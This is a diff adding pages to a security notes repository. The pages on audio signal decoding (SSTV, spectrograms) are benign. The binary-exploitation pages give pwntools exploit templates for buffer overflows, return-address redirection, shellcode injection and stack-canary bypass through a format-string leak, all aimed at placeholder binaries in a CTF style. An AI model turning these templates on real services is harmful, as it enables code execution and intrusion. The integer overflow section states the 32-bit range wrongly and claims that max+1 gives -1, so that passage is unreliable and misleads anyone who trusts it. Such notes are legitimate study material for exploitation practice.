Exploit notes 1

Exploit notes 1

Author: Shiva108

audio/SSTV.md

@@ -0,0 +1,19 @@
+---
+title: SSTV (Slow-scan Television)
+description: SSTV is a picture transmission method by amateur radio operators. We can extract pictures from audio files.
+tags:
+    - Audio
+    - Spectrogram
+refs:
+    - https://oe5lxr.at/decode-sstv-with-mmsstv/
+date: 2023-07-19
+draft: false
+---
+
+## Decode SSTV
+
+There are some online tools available as below.
+
+- **MMSSTV** (for Windows)
+- **QSSTV** (for Linux)
+- **[sstv](https://github.com/colaclanth/sstv)** (Command-line tool)

audio/Spectrogram.md

@@ -0,0 +1,50 @@
+---
+title: Spectrogram
+description: A spectrogram is a visual representation of the spectrum of frequencies of a signal as it varies with time.
+tags:
+    - Audio
+    - Spectrogram
+refs:
+date: 2023-07-19
+draft: false
+---
+
+## Online Tools
+
+- **[Spectrum Analyzer](https://academo.org/demos/spectrum-analyzer/)**
+
+    Display a spectrum of signal amplitudes on different frequencies.  
+    Upload audio file like .wav or .mp3, .ogg.
+
+- **[Spectral Analyzer](https://www.dcode.fr/spectral-analysis)**
+
+- **[Morse Code Adaptive Audio Decoder](https://morsecode.world/international/decoder/audio-decoder-adaptive.html)**
+
+<br />
+
+## Using Audacity
+
+Audacity is an audio editor which also can be used for decoding signals in audio files.
+
+1. Open an audio file in Audacity.
+2. Click the name of the file at left menu (which contains the reverse triangle icon).
+3. In the drop-down menu, check **Spectrogram**.
+4. If you want to edit advanced settings, click **Spectrogram Settings** in the menu and edit values.
+5. Click **Play** button.
+
+<br />
+
+## Using Inspectrum
+
+[Inspectrum](https://github.com/miek/inspectrum) is a radio signal analyzer for **.cf32**, **.cf64**, etc.
+
+<br />
+
+## Using Rtl-433
+
+[rtl-433](https://github.com/merbanan/rtl_433) decodes radio transmissions from devices on the ISM bands.
+
+```bash
+# -A: Pulse analyzer.
+rtl_433 -A <file>
+```

audio/_data.yml

@@ -0,0 +1,4 @@
+category1: audio
+related_menus:
+  - title: Others
+    id: others

binary-exploitation/Binary-Exploitation-with-Buffer-Overflow.md

@@ -0,0 +1,206 @@
+---
+title: Binary Exploitation with Buffer Overflow
+description: Buffer overflow occurs when a program attempts to write more data to a buffer, or temporary data storage area, than it can hold. This can result in overwriting adjacent memory locations, potentially causing the program to crash or even allowing an attacker to execute arbitrary code on the target system. In the context of binary exploitation, this attack can be used to gain control of the program flow and redirect it to run attacker-controlled code, known as shellcode.
+tags:
+    - Reverse Engineering
+refs:
+date: 2023-08-14
+draft: false
+---
+
+## Investigation
+
+### Functions Lead to Buffer Overflow
+
+If the binary uses the following functions, Buffer Overflow may occurs.
+
+```bash
+gets()
+fgets()
+scanf()
+sprintf()
+strcpy()
+strcat()
+```
+
+<br />
+
+## Basic Buffer Overflow
+
+Try to find what values lead to segmentation fault.
+
+```bash
+python3 -c 'print("A"*30)' | ./example
+python3 -c 'print("A"*40)' | ./example
+python3 -c 'print("A"*50)' | ./example
+...
+```
+
+### Exploitation
+
+Abuse input/output by typing a lot of characters more than the program expects..
+
+```sh
+./example
+
+Type something:
+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
+```
+
+### Exploitation using Pwntools
+
+```python
+#!/usr/bin/python3
+from pwn import *
+
+ip   = '10.0.0.1'
+port = 1337
+
+r = remote(ip, port)
+# r = process("./example")
+
+# Payload
+offset = 30
+payload = b'A' * offset
+
+# Send payload
+r.sendline(payload)
+
+# Print the output
+print(r.recvall().decode())
+
+# Post process
+r.interactive()
+```
+
+<br />
+
+## Overriding Variables
+
+The program executes input/output by gets() or scanf(), and limit the buffer size of the variable, we can modify the variable then lead to unexpected behavior.  
+For instance, assume the program is as follow.
+
+```sh
+rizin -d ./example
+[0x0000]> aaa
+
+# Disassemble the function
+[0x0000]> pdf @ main
+# An example result
+sub   rsp, 0x70
+call  sym.imp.__isoc99_scanf       ; int scanf(const char *format)
+cmp   dword [rbp-0x4], 0xdeadbeef
+jne   0x5569e8600992
+lea   rdi, str.bin_sh              ; "/bin/sh"
+ret
+```
+
+First find the distance from the stack pointer to rbp-0x4 (0x04).
+
+```python
+python3
+>>> int(0x70-0x4)
+108
+```
+
+### Exploitation using Pwntools
+
+```python
+from pwn import *
+
+context.update(arch="amd64", os="linux")
+
+payload = b"A" * 108
+payload += p32(0xdeadbeef)
+
+p = process('./example') # p = remote('example.com', '1337') for remote connection
+p.sendline(payload)
+p.interactive()
+```
+
+<br />
+
+## Overriding the Next Call
+
+If the program uses **get()** or **scanf()**, we can specify the address of the desired calls by overwriting the address.  
+Assume the program has the above two functions.
+
+```sh
+0x0040158c  main
+0x00401194  vuln_fn
+```
+
+For instance, if we want to call the **“vuln_fn”** function,  override the address of the next call using buffer overflow.
+
+### Exploitation 1
+
+```python
+from pwn import *
+
+context.update(arch="amd64", os="linux")
+
+elf = context.binary = ELF("./example")
+
+payload = b"A" * 32
+# Give the address of the desired function.
+payload += p64(elf.sym["vuln_fn"])
+# or if PIE is disabled, we can set the address directly.
+# payload += p64(0x00401194)
+
+p = process('./example') # p = remote('example.com', '1337') for remote connection.
+
+p.sendline(payload)
+p.interactive()
+```
+
+### Exploitation 2
+
+```bash
+from pwn import *
+
+exe = ELF("./example")
+
+r = process(exe.path)
+# r = remote("10.0.0.1", "1337")
+
+base_addr = 0x123456
+payload = b'A'*0x30 + p64(exe.bss()) + p64(base_addr)
+r.sendline(payload)
+
+r.interactive()
+```
+
+<br />
+
+## Shellcode
+
+We can create the crafted shell code and override the address to execute the shell code.  
+Use **Pwntools** to create the shell code.
+
+```python
+from pwn import *
+
+context.update(arch="amd64", os="linux")
+
+payload = b"A" * 50 + b"B" * 8
+payload += asm(shellcraft.sh())
+
+p = process('./example') # p = remote('example.com', '1337') for remote connection
+p.sendline(payload)
+p.interactive()
+```
+
+<br />
+
+## Integer Overflow
+
+If the program processes integer values with input/output, we can abuse it by overflow of integer.  
+The range of 32-bit integer is **-2147483647 to 2147483647**, so if we type the max value +1 in input for instance, the result is -1. This is because
+
+```bash
+./example
+
+Type number:
+>> 2147483648
+The number you entered is -1.
+```

binary-exploitation/Binary-Exploitation-with-Canary-Bypass.md

@@ -0,0 +1,43 @@
+---
+title: Binary Exploitation with Canary Bypass
+description: A canary helps to prevent buffer overflow attacks by detecting stack overflow and preventing the program from crashing. Canary Bypass is used to bypass the protection provided by the stack canary. This is done by finding a way to overwrite the canary value without corrupting it.
+tags:
+    - Reverse Engineering
+refs:
+    - https://ir0nstone.gitbook.io/notes/
+date: 2023-02-12
+draft: false
+---
+
+## Exploitation
+
+```python
+from pwn import *
+import re
+
+context.update(arch="amd64", os="linux")
+
+filepath = "./example"
+elf = context.binary = ELF(filepath)
+
+p = process(filepath) # p = remote('example.com', '1337') for remote connection
+
+# We need to find the stack canary. This address ends with "00".
+# To find it, execute p.sendline(b"%p %p %p %p ...").
+p.sendline(b"%10$p %13$p")
+p.recvuntil(b"result: ")
+leaked = p.recvline().split()
+print(leaked)
+base = int(leaked[0], 16) - 0xa90
+canary = int(leaked[1], 16)
+elf.address = base
+
+payload = b"A"*24
+payload += p64(canary)
+payload += b"B"*8
+payload += p64(base + 0x6fe)
+payload += p64(elf.sym["target_func"])
+
+p.sendline(payload)
+p.interactive()
+```